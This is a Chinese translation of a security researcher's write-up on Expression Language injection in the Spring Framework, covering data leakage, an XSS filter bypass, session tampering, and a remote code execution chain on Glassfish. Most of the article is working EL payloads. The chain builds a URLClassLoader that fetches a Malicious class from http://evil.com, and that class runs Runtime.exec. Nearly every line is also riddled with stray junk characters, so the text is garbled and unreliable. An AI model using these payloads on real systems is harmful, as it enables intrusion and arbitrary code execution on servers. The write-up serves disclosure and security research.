Remote Code with
3 E6 N8 j* d3 N7 R7 ZExpression Language Injection: m* K9 r+ `. v4 S7 M f
Spring Framework脆弱性—DanAmodio
7 g/ \( Q4 n+ {全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
! I4 Q: V8 Q- S7 O& I8 _1 a) w* a可能会存在风险。" [) { y3 v3 c2 i* h5 X p
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的$ s6 Q( ]4 a2 d, v9 c6 `0 p6 p0 D
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可, Z; U: q4 \* c) E' F( d
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
3 U/ D* D2 H6 S. X0 ^0 y! K以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
2 q- l1 w, S5 m. u' U3 g版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
5 o- p7 k" a% O& i1 l+ w由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
0 n" Q" U1 q! _我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版 A6 S, c" b% A3 q6 e
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
/ ~" K8 j8 P" F9 j6 e, Z这些版本不支持禁用double EL resolution.
4 B% ^ \2 y( x! @这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含% {' t X9 p' s5 [( a/ X
EL2.2容器上可能进行远程代码执行。
6 V% W u- Y4 U. T. s0 T# A这是一个原始信息泄露的攻击例子:
& Q7 C; U) v3 M4 ?" R9 p1 Q- K( r# _请求:
; e- x1 {; W, q; i9 {ttp://vulnerable.com/foo?message=${applicationScope}$ d* H l K% P
到达以下内容页面:! ^* N Y' ? |/ g% U6 f
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
0 J' {2 `" R' {( z: x0 R你也可以做一些其他事情,如这样:
* u/ t/ \& l: }; j4 O${9999+1}3 ]4 J4 F2 ^ Z8 s2 Y5 f! ^# {' J
还可以访问session 对象和beans
# ^' W0 u' c# M${employee.lastName}* K/ T3 ]7 ^ U8 l; h+ Z6 C
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是+ C+ I! x1 u$ _/ m. q% V" Z( O
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
& D$ d" {9 J# t9 Y7 C; p西,比如XSS.9 ]) V: a1 [' R0 R
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签& q9 z3 X. H5 o2 ` i( j a
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤& u. I$ W8 ]% o) x2 o, f5 i/ g
呢?”/ d9 e% X1 B* E+ w+ O( O" I# [
因此,我尝试巳缦拢�* U, y2 L' R' A" z$ {) o+ u8 J2 J
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
6 X) [% M& y& V4 mP
0 Y6 o5 V/ f4 i3 K0 { K我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返1 x9 s" F5 e" T0 `; A: J
回的文本被插入进了spring:message 标签。$ ?/ { _( X% x; M
这里是一个最终绕过过滤的实例:* y4 M6 H6 f$ Q0 X2 F+ J
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ3 _; w4 { Q5 {/ e w
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为* |- T) [. p8 V8 L: b u1 x
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
( @ B$ L; C3 ~& r# K5 g经过一番研究,我学习到EL2.2 增加了方法调用。7 M3 y) f& q q8 s' e
我写了一个快速测试应用程序代码并且检测一些功能& S: L/ c& a: S' t2 k
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
1 k! ?$ @1 G& Z( u( v7 F6 N${pageContext.request.getSession().setAttribute(“admin”,true)}
1 v6 ^% m+ @( [1 [5 j3 L好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的3 b% }4 f: t( Z* K! _! ?- y' A
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
, K( Z. v) _; i; k- x& ]. J3 L$ q${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
' d& j; \1 a1 ]! e% @& K- ^; _“, 1234)}
; }6 Q! O: W9 P5 W${“”.getClass().forName(“java.lang.Runtime”)}
! p/ b n& L: \, g哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不0 y% a- a$ J' @9 ~% f
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
/ ?: U! C4 s' f1 ^6 D数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有" q3 x# I; w- y' B& s: _
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
/ [9 K5 n# q' K9 x方法签名invoke(Object obj, Object„ args)! D! H: Q3 Q$ \3 |* l% M; ^
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
- n( y: w. e- d6 a. O# a题,以让它可以工作起来。4 l3 |/ a1 d! K8 D& `: W
漏洞利用:
5 ^! F; M+ Q1 R6 D/ G. N我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
# _3 ?6 J( M# v6 C: y$ q/ k希望你们中的一些JAVA奇才告诉我我是如此的可笑。$ l/ X0 x2 W( K$ L+ T8 t ?7 K
这里有一些我试过的失败的用例,为了试图让它工作的用例:, H* u+ ~$ m$ \* j. ] m' \( L. h5 O
写文件到文件系统
& z$ U; r) \, _' |. _ 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
4 o7 Z& A( I0 R9 q我认为这些可以很好的工作,但是我不能找到合适的类来载入。
/ S8 L$ f5 q# [( q, h${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}3 w& {3 }$ W* g
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
2 k a0 j3 `! ], \" b9 H$ Sorg.springframework.expression.spel.standard.SpelExpressionParser not found
, [2 U6 q4 W( h7 ?0 @! K. F$ sby
8 s6 _& y G+ w3 Worg.glassfish.web.javax.servlet.jsp [194].
6 L n$ ]2 b& W0 I' f 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
/ g5 J; [3 m( E! b, I/ o7 I: q 利用反射来创建一个新的Runtime(and watch the world burn)
+ W, S- X+ f% @) M${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
6 y$ `3 _6 l& h# E- L(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
O4 j4 a- U! M# D& k7 n9 P& k${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}6 [2 b" f' d- Y/ r- x
使用java.lang.ProcessBuilder
7 O6 t1 g, \1 O5 Y+ H+ X9 i 用表达式语言来评估表达式语言
; o7 W. n' U# p1 y2 \0 ]: lExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义." s( m5 R* |$ `9 ~3 Z( ^" O
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
/ t8 ?2 A6 T% B“,”".getClass(),null)}0 N8 V$ q W( E7 m9 o" L0 u
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)) x0 E5 q0 M: d% O' @! |9 [/ S
我在使用一个空数组通过Method.invoke()时失败了很多次
Q1 G( l: ~& c) _# I G, H+ a“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo+ }) {! ^. `0 c! ?2 Y
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
# ~- E# h% d1 ^( N7 y) r9 OrrayList”).newInstance().toArray())6 B$ Z1 k/ {- p% Q7 s1 H
java.lang.IllegalArgumentException: wrong number of arguments* f: T( J7 o7 N# w& T
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
3 B1 D. _. [* S9 {) y& [( t8 @以创建一个恶意class文件并且指向类装载器.
" D k4 E% M; E5 P! j9 f. m我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
, @: i8 M% f Upublic class Malicious {1 `3 d% Z) D7 c: a
public Malicious() {* o: g0 a J4 X6 s4 \' y4 T' ]# o
try {3 o' p _ H6 f) J4 j
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
: a; d- @5 U+ L' y! ljava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win! I: i0 T* @% k* N
} catch (Exception e) {: S6 t+ @( w( F$ n8 O
}
7 a/ K. K) i/ p( }( H}
8 i- z- p" `2 g. y! T我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回. g, i& G" g7 O' l- E
话中,因此它可以被使用.7 O( u6 S9 m7 |& E' ^
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
# @; f" e4 h/ [# C(“java.util.ArrayList”).newInstance())}" G8 M; g+ S6 J* b. m: r. Y
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建2 Y0 \" S2 j' z3 @4 J
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
, o* @" ?" d8 p' FgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
8 p0 q; v: H7 e# a2 {# K$ h! e我们可以调用的create(string)方法,然后转换对一个URL对象。
2 {1 {2 f' F7 p# S9 j${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh6 [" H( ^- q9 S: @/ M
ere/malicious/classfile/is/located/”).toURL())}
* O* T- x: w/ {1 x6 h+ a9 S, I0 R) |然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
4 B: b+ [: z. S7 R% Y1 Z- G恶意类文件被装载并创建,触发远程代码.0 E; Z2 i1 W4 h3 P9 a8 C- F6 n
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte' b, k' z9 n; f. E8 H3 Q
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass(). |. n& d* W) W w" m! B1 R& Q+ l
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
& ^4 L- L# g. q' W. b* e()} |